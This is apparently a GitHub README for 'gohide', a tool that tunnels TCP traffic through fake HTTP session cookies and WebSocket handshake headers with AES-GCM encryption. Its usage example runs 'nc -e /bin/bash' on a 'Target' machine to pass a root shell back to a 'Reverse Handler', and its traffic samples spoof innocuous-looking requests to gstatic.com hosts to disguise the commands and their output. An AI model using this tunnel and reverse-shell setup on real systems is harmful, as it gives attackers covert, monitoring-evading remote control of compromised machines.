gohide: Tunnel TCP port to port traffic over an obfuscated channel with AES-GCM encryption

gohide

The tunnel TCP port to port traffic via an obfuscated channel with AES-GCM encryption.

Obfuscation Modes

• Session Cookie HTTP GET (http-client)
• Set-Cookie Session Cookie HTTP/2 200 OK (http-server)
• WebSocket Handshake “Sec-WebSocket-Key” (websocket-client)
• WebSocket Handshake “Sec-WebSocket-Accept” (websocket-server)
• No obfuscation, just use AES-GCM encrypted messages (none)

AES-GCM is enabled by default for each of the options above.

Install

go get github.com/Potato-Industries/gohide

Use

Scenario

Box A – Reverse Handler.

root@WOPR-KALI:/opt/gohide# ./gohide -f 0.0.0.0:8081 -l 127.0.0.1:8080 -r 127.0.0.1:9091 -m websocket-client

Local Port Forward Listening: 127.0.0.1:8080

FakeSrv Listening: 0.0.0.0:8081

Box B – Target.

root@WOPR-KALI:/opt/gohide# ./gohide -f 0.0.0.0:9091 -r 127.0.0.1:8081 -l 127.0.0.1:9090 -m websocket-server

Local Port Forward Listening: 127.0.0.1:9090

FakeSrv Listening: 0.0.0.0:9091

Box B – Netcat /bin/bash

root@WOPR-KALI:/var/tmp# nc -e /bin/bash 127.0.0.1 9090

Box A – Netcat client

root@WOPR-KALI:/opt/gohide# nc -v 127.0.0.1 8080

localhost [127.0.0.1] 8080 (http-alt) open

id

uid=0(root) gid=0(root) groups=0(root)

uname -a

Linux WOPR-KALI 5.3.0-kali2-amd64 #1 SMP Debian 5.3.9-1kali1 (2019-11-11) x86_64 GNU/Linux

netstat -pantwu 

Active Internet connections (servers and established)

tcp        0      0 127.0.0.1:39684         127.0.0.1:8081          ESTABLISHED 14334/./gohide      

Obfuscation Samples

websocket-client (Box A to Box B)

• Sec-WebSocket-Key contains AES-GCM encrypted content e.g. “uname -a”.

  GET /news/api/latest HTTP/1.1
  
  Host: cdn-tb0.gstatic.com
  
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
  
  Upgrade: websocket
  
  Connection: Upgrade
  
  Sec-WebSocket-Key: 6jZS+0Wg1IP3n33RievbomIuvh5ZdNMPjVowXm62
  
  Sec-WebSocket-Version: 13

   

   

websocket-server (Box B to Box A)

• Sec-WebSocket-Accept contains AES-GCM encrypted output.

  HTTP/1.1 101 Switching Protocols
  
  Upgrade: websocket
  
  Connection: Upgrade
  
  Sec-WebSocket-Accept: URrP5l0Z3NIHXi+isjuIyTSKfoP60Vw5d2gqcmI=

   

   

   

http-client

• Session cookie header contains AES-GCM encrypted content

  GET /news/api/latest HTTP/1.1
  
  Host: cdn-tbn0.gstatic.com
  
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
  
  Accept: */*
  
  Accept-Language: en-US,en;q=0.5
  
  Accept-Encoding: gzip, deflate, br
  
  Referer: http://www.bbc.co.uk/
  
  Connection: keep-alive
  
  Cookie: Session=R7IJ8y/EBgCanTo6fc0fxhNVDA27PFXYberJNW29; Secure; HttpOnly

   

   

   

http-server

• Set-Cookie header contains AES-GCM encrypted content.

  HTTP/2.0 200 OK
  
  content-encoding: gzip
  
  content-type: text/html; charset=utf-8
  
  pragma: no-cache
  
  server: nginx
  
  x-content-type-options: nosniff
  
  x-frame-options: SAMEORIGIN
  
  x-xss-protection: 1; mode=block
  
  cache-control: no-cache, no-store, must-revalidate
  
  expires: Thu, 21 Nov 2019 01:07:15 GMT
  
  date: Thu, 21 Nov 2019 01:07:15 GMT
  
  content-length: 30330
  
  vary: Accept-Encoding
  
  X-Firefox-Spdy: h2
  
  Set-Cookie: Session=gWMnQhh+1vkllaOxueOXx9/rLkpf3cmh5uUCmHhy; Secure; Path=/; HttpOnly

   

   

Source: https://github.com/Potato-Industries/